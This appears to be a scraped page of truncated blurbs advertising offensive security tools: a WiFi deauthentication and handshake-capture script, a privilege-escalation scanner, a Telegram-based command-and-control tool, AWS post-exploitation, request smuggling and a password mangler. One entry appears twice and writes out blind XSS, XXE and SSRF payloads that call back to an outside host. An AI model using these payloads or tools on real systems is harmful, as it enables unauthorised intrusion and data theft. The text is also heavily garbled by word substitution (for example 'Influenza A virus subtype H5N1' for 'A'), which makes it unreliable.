sf

Hashcatch deauthenticates clients connected to all nearby WiFi networks together with tries to capture the handshakes. It tin endure used inwards whatever linux device including Raspberry Pi together with Nethunter devices thus that y'all tin capture handshakes piece walking your dog Written past times @SivaneshAshok PoC of hashcatch (running alongside a span of WiFi networks inside range) Setting up ./setup.sh Enter the interface that tin endure switched to monitor mode The script volition install the prerequisites Usage sudo ./hashcatch.sh The script runs indefinitely until keyboard interrupt If you're targeting a wifi network, pass unopen to xx to thirty seconds inside the wifi's hit to ensure handshake capture Handshakes captured volition endure stored inwards handshakes/ directory The captured WiFi network's BSSID together with ESSID volition endure stored inwards db file [Experimental] If y'all are connected to the cyberspace piece ca...

Constellation is a graph-focused information visualisation in addition to interactive analysis application enabling information access, federation in addition to manipulation capabilities across large in addition to complex information sets. Vision Statement Constellation is a offset class, domain agnostic information visualisation in addition to analysis application enabling the user to solve large in addition to complex information problems inwards a uncomplicated in addition to intuitive way. Users : information analysts, information scientists, in addition to all people interested inwards graph information analysis. Data analysis domains : graph datasets alongside rich characteristic information e.g. social networks, network infrastructure, chemic composition, etc. Prerequisites Constellation requires at to the lowest degree Open JDK 8 alongside JFX 8 back upwards construct to last installed in addition to is known to operate on Windows 64-bit in addition to Linu...

Using 0xsp mongoose y'all volition endure able to scan targeted operating arrangement for whatever possible agency for privilege escalation attacks, starting from collecting information phase until reporting information through 0xsp Web Application API. user volition endure able to scan dissimilar Linux / windows Operation systems at the same fourth dimension alongside high performance, without spending fourth dimension looking within the finally or text file for what is found, mongoose shortens this agency past times allowing y'all to post this information straight into spider web application friendly interface through tardily API endpoint. projection is divided into 2 sections server & agent . server has been coded alongside PHP( codeigniter ) y'all demand to install this application into your preferred environment, y'all tin utilization it online or on your localhost. user is costless to alternative .also contribution to enhancing features are most welc...

Toolkit to unwrap as well as operate past times on runway on Blind XSS, XXE & SSRF. SETUP Upload the files to your server. Create a Database as well as upload database.sql file to it. Change the DB Credentials inwards db.php file. Ready. USAGE BLIND XSS <embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> BLIND XXE <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> SSRF GET /testssrf.php=http://mysite.com/bxssrf/request.php DEFAULT CREDENTIALS USER : admin@test.com PASS : 123456 Download B-XSSRF

Toolkit to unwrap as well as operate past times on runway on Blind XSS, XXE & SSRF. SETUP Upload the files to your server. Create a Database as well as upload database.sql file to it. Change the DB Credentials inwards db.php file. Ready. USAGE BLIND XSS <embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> BLIND XXE <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> SSRF GET /testssrf.php=http://mysite.com/bxssrf/request.php DEFAULT CREDENTIALS USER : admin@test.com PASS : 123456 Download B-XSSRF

This is an extension for Burp Suite designed to assist you lot launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities in addition to besides aids exploitation past times treatment cumbersome offset-tweaking for you. Install The easiest agency to install this is inward Burp Suite, via Extender -> BApp Store. If you lot prefer to charge the jounce manually, inward Burp Suite (community or pro), role Extender -> Extensions -> Add to charge build/libs/http-request-smuggler-all.jar Compile Turbo Intruder is a dependency of this project, add together it to the root of this source tree equally turbo-intruder-all.jar Build amongst gradle fatJar Use Right click on a asking in addition to click 'Launch Desync probe', in addition to therefore sentry the extension's output pane nether Extender->Extensions->HTTP Request Smuggler If you're using B...

Command together with Control for C# Writing Author: Leiothrix Telegram: @Leiothrix Twitter: @wh4am1 Team: QQ愛&Love Install Nuget download these package using System.IO; using Telegram.Bot; using Telegram.Bot.Args; using Telegram.Bot.Types.InputFiles; using AForge.Video; using AForge.Controls; using AForge.Video.DirectShow; Add related classes inwards 'References' System.Drawing; System.Windows.Forms; How to used Modify your Token to the program static void Main(){ botClient = novel TelegramBotClient("token"); //Your Token botClient.OnMessage += Bot_OnMessage; botClient.StartReceiving(); Thread.Sleep(int.MaxValue); } have adept fun. Proxy TelegramBotClient allows you lot to role a proxy for Bot API connections. HTTP You tin hand the axe overstep an IWebProxy to bot customer for HTTP Proxies. // using System.Net; var httpProxy = novel WebProxy("https://example.org...

barq: The AWS Cloud Post Exploitation framework! What is it? barq is a post-exploitation framework that allows yous to easily perform attacks on a running AWS infrastructure. It allows yous to laid upward on running EC2 instances without having the master copy instance SSH keypairs. It also allows yous to perform enumeration as well as extraction of stored Secrets as well as Parameters inwards AWS. Prerequisites An existing AWS line organisation human relationship access fundamental id as well as undercover (Token likewise inwards unopen to case) Python ii or 3. It tin sack run amongst both. To run the msfvenom payloads, yous withdraw msfvenom to live on available on your workstation, amongst the PATH setup correctly. Installing For python 2: pip install -r requirements.txt For python3 pip3 install -r requirements.txt Better to practise a virtualenv environs for the tool. Please banking concern annotation that using sudo amongst pip is non recommended. Author ...

Influenza A virus subtype H5N1 elementary wordlist generator together with mangler written inwards python. It makes usage of python multiprocessing capabilities inwards lodge to speed upward his task (CPU intensive). Supported permutations: Capital Upper 1337 Append Prepend Additional functions: Test/Dry run Multiprocessing Multicore Possibility to adapt cores/processes publish manually. Each generated password doesnt comprise same discussion twice. Preview: usage: wordlister.py [-h] --input INPUT --perm PERM --min MIN --max MAX [--test TEST] [--cores CORES] [--leet] [--cap] [--up] [--append APPEND] [--prepend PREPEND] Influenza A virus subtype H5N1 elementary wordlist generator together with mangler written inwards python. optional arguments: -h, --help exhibit this assist message together with choke --test TEST Output offset due north iterations (single process/core) --cores CORES Manually...